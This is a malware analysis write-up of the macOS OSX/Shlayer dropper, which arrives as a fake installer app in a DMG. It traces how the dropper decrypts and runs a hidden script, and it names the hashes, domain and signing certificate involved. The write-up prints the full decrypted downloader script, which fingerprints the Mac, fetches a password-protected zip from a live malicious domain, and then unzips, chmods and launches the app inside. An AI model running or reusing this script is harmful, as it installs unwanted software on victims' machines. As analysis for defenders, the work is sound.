Skip to content

Latest commit

 

History

History
153 lines (145 loc) · 7.39 KB

OSX.Shlayer.md

File metadata and controls

153 lines (145 loc) · 7.39 KB
Raw

OSX/Shlayer

SHA256sums:

  • df70a13713836475de5361f8ec048823e15ebdefd15511c597c5e8d62aac26a1 innmvlldvhukbgzruvdq

Analysis

Malware got from Putlocker's ads (don't ask) using the domain tucam.pw. I've found some other resources but wanted to play a little bit with this one. You can get a sample from Objective-See's malware repo.

$ spctl --assess -vv Brooklyn\ Nine-Nine.dmg 
Brooklyn Nine-Nine.dmg: rejected
source=no usable signature

The DMG volume contains an app called Installer.app.

$ plutil -p Info.plist 
{
  "CFBundleExecutable" => "innmvlldvhukbgzruvdq"
  "CFBundleIconFile" => "app4243.icns"
  "CFBundleIdentifier" => "com.innmvlldvhukbgzruvdq"
  "CFBundleInfoDictionaryVersion" => "6.0"
  "CFBundleName" => "Installer"
  "CFBundlePackageType" => "APPL"
  "CFBundleShortVersionString" => "1.0"
  "CFBundleSupportedPlatforms" => [
    0 => "MacOSX"
  ]
  "CFBundleVersion" => "2623411592"
  "LSMinimumSystemVersion" => "10.9"
  "NSHumanReadableCopyright" => "Copyright © 2017 All rights reserved."
  "NSPrincipalClass" => "NSApplication"
}

Turns out is OSX/Shlayer (got 18/58 on VirusTotal). The executable file inside MacOS/ is a bash script:

$ file innmvlldvhukbgzruvdq 
innmvlldvhukbgzruvdq: Bourne-Again shell script text executable, ASCII text
1 #!/bin/bash                                                                                                                                                                                                                                                                       
2 cd "$(dirname "$BASH_SOURCE")"                                                                                                                                                                                                                                                    
3 fileDir="$(dirname "$(pwd -P)")"                                                                                                                                                                                                                                                  
4 eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:2623411592 <"$fileDir"/Resources/enc)"

It evaluates an AES-256-CBC encrypted file on ../Resources/enc which is also base64 encoded. The content:

#!/bin/bash 

ENC_PASS="2623411592"
APP_DOMAIN="www.negeg.space"
APP_ROUTE="download/dlst"
unzip_password="295114326226234115923456789"

os_version="$(sw_vers -productVersion)" 
session_guid="$(uuidgen)" 
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')" 

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path} 
app_dir="$(mktemp -d /tmp/XXXXXXXX)/" 
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1 
rm -f ${tmp_path} 
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))" 
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')" 
volume_name="${volume_name// /%20}" 
chmod +x "${app_dir}${file_name}/Contents/MacOS"/* 
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

This will download a ZIP file from www.neg.space (so block it!):

$ dig www.negeg.space +short
www.negeg.space.edgesuite.net.
a74.dscg1.akamai.net.
186.179.74.215
186.179.74.201

The content of the ZIP, which is password protected:

$ curl -Lv "http://www.negeg.space/download/dlst?mid=XXX&s=XXX&o=10.13.5&p=2623411592" > shlayer.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 186.179.74.201...
* TCP_NODELAY set
* Connected to www.negeg.space (186.179.74.201) port 80 (#0)
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0> GET /download/dlst?mid=XXX&s=XXX&o=10.13.5&p=2623411592 HTTP/1.1
> Host: www.negeg.space
> User-Agent: curl/7.54.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Content-Type: application/octet-stream
< Content-Length: 71651
< Content-Disposition: attachment; filename="output_zip_file.zip"
< Date: Thu, 19 Jul 2018 16:40:05 GMT
< Connection: keep-alive
< 
{ [1809 bytes data]
100 71651  100 71651    0     0  52893      0  0:00:01  0:00:01 --:--:-- 52918
* Connection #0 to host www.negeg.space left intact
$ file shlayer.zip 
shlayer.zip: Zip archive data, at least v1.0 to extract
$ unzip -t shlayer.zip 
Archive:  shlayer.zip
    testing: Installer.app/           OK
    testing: Installer.app/Contents/   OK
    testing: Installer.app/Contents/Resources/   OK
    testing: Installer.app/Contents/Resources/Base.lproj/   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/   OK
[shlayer.zip] Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib password: 
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/MainMenu.nib   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/Info.plist   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/NSWindowController-B8D-0N-5wS.nib   OK
    testing: Installer.app/Contents/Info.plist   OK
    testing: Installer.app/Contents/MacOS/   OK
    testing: Installer.app/Contents/MacOS/Installer   OK
    testing: Installer.app/Contents/PkgInfo   OK
    testing: Installer.app/Contents/_CodeSignature/   OK
    testing: Installer.app/Contents/_CodeSignature/CodeResources   OK
No errors detected in compressed data of shlayer.zip.

Now it has an Installer app which contains a real Mach-O x86-64 binary and seems to be written by batman itself and signed by Alan Winder:

131747        0x202A3         Unix path: /Users/batman/Documents/smart-install/New_Installer/ppios/Installer_webview/Installer_webview/
...
$ codesign -dvvv Installer.app
Executable=/private/tmp/Installer.app/Contents/MacOS/Installer
Identifier=com.Play
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=1512 flags=0x0(none) hashes=40+5 location=embedded
Hash type=sha256 size=32
CandidateCDHash sha1=95894af840fc42256da3582dfc5ab21127b44682
CandidateCDHash sha256=fb9efd8582c01bb63ab3b7c4e861efae347c21ea
Hash choices=sha1,sha256
CDHash=fb9efd8582c01bb63ab3b7c4e861efae347c21ea
Signature size=4695
Authority=Developer ID Application: Alan Winder (RB35AD84K3)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Signed Time=17 Jul 2018, 04:10:16
Info.plist entries=24
TeamIdentifier=RB35AD84K3
Sealed Resources version=2 rules=13 files=4
Internal requirements count=1 size=200
$ shasum -a256 Installer.app/Contents/MacOS/Installer 
c65e995d436df059dafb7c6dc62af97a04477da28c3898c95278b7610adc7c78  Installer.app/Contents/MacOS/Installer

The little fella seems to be OSX/Genieo-DG (Adware).

Note: this dmg is autodownloaded so it has a pretty intrusive behaviour for someone not experienced or confused after seeing that file on ~/Downloads